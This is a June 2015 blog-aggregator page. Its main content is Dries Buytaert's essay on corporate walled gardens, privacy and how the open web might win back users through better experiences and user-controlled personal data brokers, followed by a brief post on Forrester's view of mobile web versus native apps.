Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

23 Jun 2015 4:17pm GMT

Dries Buytaert: Winning back the Open Web

The web was born as an open, decentralized platform allowing different people in the world to access and share information. I got online in the mid-nineties when there were maybe 100,000 websites in the world. Google didn't exist yet and Steve Jobs had not yet returned to Apple. I remember the web as an "open web" where no one was really in control and everyone was able to participate in building it. Fast forward twenty years, and the web has taken the world by storm. We now have a hundreds of millions of websites. Look beyond the numbers and we see another shift: the rise of a handful of corporate "walled gardens" like Facebook, Google and Apple that are becoming both the entry point and the gatekeepers of the web. Their dominance has given rise to major concerns.

We call them "walled gardens" because they control the applications, content and media on their platform. Examples include Facebook or Google, which control what content we get to see; or Apple, which restricts us to running approved applications on iOS. This is in contrast to the "open web", where users have unrestricted access to applications, content and media.

Facebook is feeling the heat from Google, Google is feeling the heat from Apple but none of these walled gardens seem to be feeling the heat from an open web that safeguards our privacy and our society's free flow of information.

This blog post is the result of people asking questions and expressing concerns about a few of my last blog posts like the Big Reverse of the Web, the post-browser era of the web is coming and my DrupalCon Los Angeles keynote. Questions like: Are walled gardens good or bad? Why are the walled gardens winning? And most importantly; how can the open web win? In this blog post, I'd like to continue those conversations and touch upon these questions.

Are "walled gardens" good or bad for the web?

What makes this question difficult is that the walled gardens don't violate the promise of the web. In fact, we can credit them for amplifying the promise of the web. They have brought hundreds of millions of users online and enabled them to communicate and collaborate much more effectively. Google, Apple, Facebook and Twitter have a powerful democratizing effect by providing a forum for people to share information and collaborate; they have made a big impact on human rights and civil liberties. They should be applauded for that.

At the same time, their dominance is not without concerns. With over 1 billion users each, Google and Facebook are the platforms that the majority of people use to find their news and information. Apple has half a billion active iOS devices and is working hard to launch applications that keep users inside their walled garden. The two major concerns here are (1) control and (2) privacy.

First, there is the concern about control, especially at their scale. These organizations shape the news that most of the world sees. When too few organizations control the media and flow of information, we must be concerned. They are very secretive about their curation algorithms and have been criticized for inappropriate censoring of information.

Second, they record data about our behavior as we use their sites (and the sites their ad platforms serve) inferring information about our habits and personal characteristics, possibly including intimate details that we might prefer not to disclose. Every time Google, Facebook or Apple launch a new product or service, they are able to learn a bit more about everything we do and control a bit more about our life and the information we consume. They know more about us than any other organization in history before, and do not appear to be restricted by data protection laws. They won't stop until they know everything about us. If that makes you feel uncomfortable, it should. I hope that one day, the world will see this for what it is.

While the walled gardens have a positive and democratizing impact on the web, who is to say they'll always use our content and data responsibly? I'm sure that to most critical readers of this blog, the open web sounds much better. All things being equal, I'd prefer to use alternative technology that gives me precise control over what data is captured and how it is used.

Why are the walled gardens winning?

Why then are these walled gardens growing so fast? If the open web is theoretically better, why isn't it winning? These are important questions about future of the open web, open source software, web standards and more. It is important to think about how we got to a point of walled garden dominance, before we can figure out how an open web can win.

The biggest reason the walled gardens are winning is because they have a superior user experience, fueled by data and technical capabilities not easily available to their competitors (including the open web).

Unlike the open web, walled gardens collect data from users, often in exchange for free use of a service. For example, having access to our emails or calendars is incredibly important because it's where we plan and manage our lives. Controlling our smartphones (or any other connected devices such as cars or thermostats) provides not only location data, but also a view into our day-to-day lives. Here is a quick analysis of the types of data top walled gardens collect and what they are racing towards:

Walled gardens data

On top of our personal information, these companies own large data sets ranging from traffic information to stock market information to social network data. They also possess the cloud infrastructure and computing power that enables them to plow through massive amounts of data and bring context to the web. It's not surprising that the combination of content plus data plus computing power enables these companies to build better user experiences. They leverage their data and technology to turn "dumb experiences" into smart experiences. Most users prefer smart contextual experiences because they simplify or automate mundane tasks.

Walled gardens technology

Can the open web win?

I still believe in the promise of highly personalized, contextualized information delivered directly to individuals, because people ultimately want better, more convenient experiences. Walled gardens have a big advantage in delivering such experiences, however I think the open web can build similar experiences. For the open web to win, we first must build websites and applications that exceed the user experience of Facebook, Apple, Google, etc. Second, we need to take back control of our data.

Take back control over the experience

The obvious way to build contextual experiences is by combining different systems that provide open APIs; e.g. we can integrate Drupal with a proprietary CRM and commerce platform to build smart shopping experiences. This is a positive because organizations can take control over the brand experience, the user experience and the information flow. At the same time users don't have to trust a single organization with all of our data.

Open web current state

The current state of the web: one end-user application made up of different platform that each have their own user experience and presentation layer and stores its own user data.

To deliver the best user experience, you want "loosely-coupled architectures with a highly integrated user experience". Loosely-coupled architectures so you can build better user experiences by combining your systems of choice (e.g. integrate your favorite CMS with your favorite CRM with your favorite commerce platform). Highly-integrated user experiences so can build seamless experiences, not just for end-users but also for content creators and site builders. Today's open web is fragmented. Integrating two platforms often remains difficult and the user experience is "mostly disjointed" instead of "highly integrated". As our respective industries mature, we must focus our attention to integrating the user experience as well as the data that drives that user experience. The following "marketecture" illustrates that shift:

Shared integration and user experience layer

Instead of each platform having its own user experience, we have a shared integration and presentation layer. The central integration layer serves to unify data coming from distinctly different systems. Compatible with the "Big Reverse of the Web" theory, the presentation layers is not limited to a traditional web browser but could include push technology like a notification.

For the time being, we have to integrate with the big walled gardens. They need access to great content for their users. In return, they will send users to our sites. Content management platforms like Drupal have a big role to play, by pushing content to these platforms. This strategy may sound counterintuitive to many, since it fuels the growth of walled gardens. But we can't afford to ignore ecosystems where the majority of users are spending their time.

Control personal data

At the same time, we have to worry about how to leverage people's data while protecting their privacy. Today, each of these systems or components contain user data. The commerce system might have data about past purchasing behavior, the content management system about who is reading what. Combining all the information we have about a user, across all the different touch-points and siloed data sources will be a big challenge. Organizations typically don't want to share user data with each other, nor do users want their data to be shared without their consent.

The best solution would be to create a "personal information broker" controlled by the user. By moving the data away from the applications to the user, the user can control what application gets access to what data, and how and when their data is shared. Applications have to ask the user permission to access their data, and the user explicitly grants access to none, some or all of the data that is requested. An application only gets access to the data that we want to share. Permissions only need to be granted once but can be revoked or set to expire automatically. The application can also ask for additional permissions at any time; each time the person is asked first, and has the ability to opt out. When users can manage their own data and the relationships they have with different applications, and by extension with the applications' organizations, they take control over their own privacy. The government has a big role to play here; privacy law could help accelerate the adoption of "personal information brokers".

Open web personal information broker

Instead of each platform having its own user data, we move the data away from the applications to the users, managed by a "personal information broker" under the user's control.

Open web shared broker

The user's personal information broker manages data access to different applications.

Conclusion

People don't seem so concerned about their data being hosted with these walled gardens since they've willingly given it to date. For the time being, "free" and "convenient" will be hard to beat. However, my prediction is that these data privacy issues are going to come to a head in the next five to ten years, and lack of transparency will become unacceptable to people. The open web should focus on offering user experiences that exceed those provided by walled gardens, while giving users more control over their user data and privacy. When the open web wins through improved transparency, the closed platforms follow suit, at which point they'll no longer be closed platforms. The best case scenario is that we have it all: a better data-driven web experience that exists in service to people, not in the shadows.

23 Jun 2015 8:58am GMT

Frank Goossens: Mobile web vs. Native apps; Forrester’s take

So web is going away, being replaced by apps? Forrester researched and does not agree;

Based on this data and other findings in the new report, Forrester advises businesses to design their apps only for their best and most loyal or frequent customers - because those are the only one who will bother to download, configure and use the application regularly. For instance, most retailers say their mobile web sales outweigh their app sales, the report says. Meanwhile, outside of these larger players, many customers will use mobile websites instead of a business' native app.

My biased interpretation; unless you think can compete with Facebook for mobile users' attention, mobile apps should maybe not be your most important investment. Maybe PPK conceeded victory too soon after all?

Possibly related twitterless twaddle:

23 Jun 2015 7:45am GMT